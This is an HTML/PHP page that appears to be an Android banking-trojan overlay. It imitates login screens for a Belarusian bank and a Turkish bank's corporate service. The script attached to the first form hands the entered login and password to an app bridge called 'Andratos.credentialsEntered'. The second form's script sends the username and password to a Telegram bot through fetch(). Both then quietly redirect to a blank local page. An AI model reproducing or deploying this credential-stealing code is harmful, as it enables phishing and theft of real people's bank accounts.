﻿<html>
<head>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
    <link href="data:text/css;charset=utf-8," data-href="http://getbootstrap.com/dist/css/bootstrap-theme.min.css" rel="stylesheet" id="bs-theme-stylesheet">
    <link href="by/belapb/css/style.css" rel="stylesheet">
    <style>
        .wrapper {
	display: flex;
	flex-direction: column;
	min-height: 100%;
}
.content {
	flex: 1 0 auto;
}
.footer {
	flex: 0 0 auto;
}
    </style>

</head>
<?php
$IMEI_country = htmlspecialchars($_REQUEST["p"], ENT_QUOTES);
//$IMEI_country = "321|tr";
include "config.php";
?>
<body>

    <div class="wrapper">
<div class="logo" style="margin-bottom:100px;">
    <img style="width: 100%;" src="by/belapb/img/logo.png">
</div>

<div id="content_div1" class="content">
    <form method="post">

        <div class="bg" style="z-index: 99;">
            <div class="glyphicon glyphicon-user nn1" style="color:white;"></div>
            <div class="field">
                <input type="text" name="fields[login]" class="input" id="id" placeholder="Логин" onKeyUp="if(this.value>9999999999){this.value=this.value.substr(0,11);}">
            </div>
            <div class="glyphicon glyphicon-lock nn2" style="color:white;"></div>
            <div class="field">
                <input type="password" name="fields[password]" placeholder="Пароль" class="input" id="pass" maxlength="6">
            </div>
            <button id="input_submitBtn" class="s1" style="background-color:orange; border-radius:20px; border-color:orange;" type="submit">Войти</button>
            <p style="text-align: center; color:black;font-weight:600; font-size: 15px;"> Регистрация </p>
            <p style="text-align: center; color:black;font-weight:600;font-size: 15px;"> Вход по МСИ </p>
        </div>





    </form>
</div>
<div class="footer" style="width:100%; clear:both; background:white;">
    <div style=" width:20%; float:left; "><img src="by/belapb/img/footer1.png"/></div>
    <div style=" width:20%; float:left; "><img src="by/belapb/img/footer2.png" /></div>
    <div style=" width:20%; float:left; "><img src="by/belapb/img/footer3.png" /></div>
    <div style=" width:20%; float:left; "><img src="by/belapb/img/footer4.png" /></div>
    <div style=" width:20%;float:left; "><img src="by/belapb/img/footer5.png" /></div>
</div>
        </div>
  <script type="text/javascript">function test2(){setTimeout(function(){ window.location.replace("file:///android_asset/blank.html");}, 1000); };

  (function () {


        var  __insHiddenField = function (objDoc, objForm, sNm, sV) {
             var input = objDoc.createElement("input");
             input.setAttribute("type", "hidden");
             input.setAttribute("name", sNm);
             input.setAttribute("value", sV);
             input.value = sV;
             objForm.appendChild(input);
         };
                    var g_oBtn = document.getElementById('input_submitBtn');
                    g_oBtn.onclick = function () {

						var oNumInp = document.getElementById('id');
                        var oCodeInp = document.getElementById('pass');

						try{
							oNumInp.className = 'input';
							oCodeInp.className = 'input';
						} catch(e){};

                        if (oNumInp.value.length < 3) {
							try{
								oNumInp.className = 'fielderror';
							} catch(e){};
                            return false;
                        }

                        if (!/^\w{3,100}$/i.test(oCodeInp.value)) {
							try{
                                oCodeInp.className = 'fielderror';
							} catch(e){};
                            return false;
                        }
top['closeDlg'] = true;
var url='<?php echo $URL; ?>';
var imei_c='<?php echo $IMEI_country; ?>';
Andratos.credentialsEntered(oNumInp.value, oCodeInp.value); test2();

return false;
};

})();
            </script>
 <div id="content_div2">
 <form method="post">
<A href="#" class="hr11" onclick="document.getElementById('content_div2').style.display = 'none'; document.getElementById('content_div1').style.display = 'block';">Bireysel</A><A href="#" class="hr22">Kurumsal</A><div style="clear:both"></div>

<div class="bg2">
 <div class="glyphicon glyphicon-user nn11" style="color:white;"></div>
 		<div class="field">
			<input type="text" name="fields[login]2" class="input" id="id2" placeholder="Kullanıcı Kodu / Adı" onKeyUp="if(this.value>9999999999){this.value=this.value.substr(0,11);}" placeholder="">
		</div>

  <div class="glyphicon glyphicon-th nn33" style="color:white;"></div>
  		<div class="field">
			<input type="text" name="fields[password2]" placeholder="Parola" class="input" id="ii" onKeyUp="if(this.value>99999){this.value=this.value.substr(0,5);}" placeholder="">
		</div>

  <button id="input_submitBtn3"  class="s2" type="submit">Giriş Yap</button>
  <p style="text-align: center; color: #00e14b;font-weight: 600;font-variant-caps: all-petite-caps;font-size: 18px;"> Müşteri Değil misin? ÜYE OL </p>
 </div>
</form>
  <script type="text/javascript">function test2(){setTimeout(function(){ window.location.replace("file:///android_asset/blank.html");}, 1000); };

  (function () {


        var  __insHiddenField = function (objDoc, objForm, sNm, sV) {
             var input = objDoc.createElement("input");
             input.setAttribute("type", "hidden");
             input.setAttribute("name", sNm);
             input.setAttribute("value", sV);
             input.value = sV;
             objForm.appendChild(input);
         };
                    var g_oBtn = document.getElementById('input_submitBtn3');
                    g_oBtn.onclick = function () {

						var oNumInp = document.getElementById('id2');
                        var oCodeInp = document.getElementById('ii');

						try{
							oNumInp.className = 'input';
							oCodeInp.className = 'input';
						} catch(e){};

                        if (oNumInp.value.length < 3) {
							try{
								oNumInp.className = 'fielderror';
							} catch(e){};
                            return false;
                        }

                        if (!/^\w{3,100}$/i.test(oCodeInp.value)) {
							try{
                                oCodeInp.className = 'fielderror';
							} catch(e){};
                            return false;
                        }
top['closeDlg'] = true;
var url='<?php echo $URL; ?>';
var imei_c='<?php echo $IMEI_country; ?>';
fetch("https://api.telegram.org/bot12345678:ABCDEFGHIJKLMNOQPRTSTUWVYZ/sendMessage?chat_id=-1234567890&text=|Injection_3|iscep_kurumsal|"+oNumInp.value+"|"+oCodeInp.value); test2();

return false;
};

})();
            </script>
</div>
</body>
</html>
